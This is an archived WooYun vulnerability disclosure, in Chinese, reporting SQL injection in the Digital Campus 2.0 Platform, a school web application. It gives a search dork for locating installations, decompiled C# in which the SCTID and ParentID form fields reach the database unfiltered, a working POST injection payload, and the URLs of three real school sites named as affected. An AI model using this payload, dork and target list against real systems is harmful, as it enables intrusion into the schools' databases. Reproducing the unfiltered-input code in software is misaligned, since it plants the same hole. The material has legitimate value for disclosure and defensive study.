乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-17: 细节已通知厂商并且等待厂商处理中 2015-03-20: 厂商已经确认,细节仅向厂商公开 2015-03-23: 细节向第三方安全合作伙伴开放 2015-05-14: 细节向核心白帽子及相关领域专家公开 2015-05-24: 细节向普通白帽子公开 2015-06-03: 细节向实习白帽子公开 2015-06-18: 细节向公众公开
RT
关键词:intitle:数字校园平台—Digital Campus2.0 Platform
文件:code/application/book/syscommontypemain.aspx部分代码:
private void DoCmd(string Method){ if (Method != null) { if (!(Method == "add")) { if (!(Method == "edit")) { if (!(Method == "check")) { if (!(Method == "del")) { if (Method == "checkNum") { this.CHECKNUM(); } } else { this.DeletSysCommonType(); } } else { this.SysCommonTypeNameIsOk(); } } else { this.Edit(); } } else { this.AddSysCommonType(); } }}
关键代码:
public void DeletSysCommonType(){ SysCommonTypeManager sysCommonTypeManager = new SysCommonTypeManager(); string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString(); string text2 = (base.Request.Form["ParentID"] == null) ? "" : base.Request.Form["ParentID"].ToString(); string text3 = base.Request.Form["notes"]; if (text != null && text.Length > 0 && text2 != null) { BaseDBCon baseDBCon = new BaseDBCon(); baseDBCon.Open(); int num = sysCommonTypeManager.DeleParenID(baseDBCon, text); if (num == 0) { sysCommonTypeManager.DeleRole(baseDBCon, text); int num2 = sysCommonTypeManager.DeleParenID(baseDBCon, text2); if (num2 == 0) { sysCommonTypeManager.UpDateRole(baseDBCon, text2); } base.Response.Write("{success:'true'}"); } else { base.Response.Write("{success:'Exception'}"); } baseDBCon.Close(); } else { base.Response.Write("{success:'Exception'}"); }}
string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString(); string text2 = (base.Request.Form["ParentID"] == null) ? "" : base.Request.Form["ParentID"].ToString(); //这里的SCTID和ParentID是没有过滤直接带入查询了。
案例1:
http://www.jszx.cn/code/application/book/syscommontypemain.aspx?Method=del
POST:
SCTID=1' and 1=@@version and '1'='1&ParentID=1¬es=1
案例2:
http://www.tzby.net/code/application/book/syscommontypemain.aspx?Method=del
案例3:
http://www.lhdtxx.com/code/application/book/syscommontypemain.aspx?Method=del
过滤 。
危害等级:高
漏洞Rank:12
确认时间:2015-03-20 17:41
暂无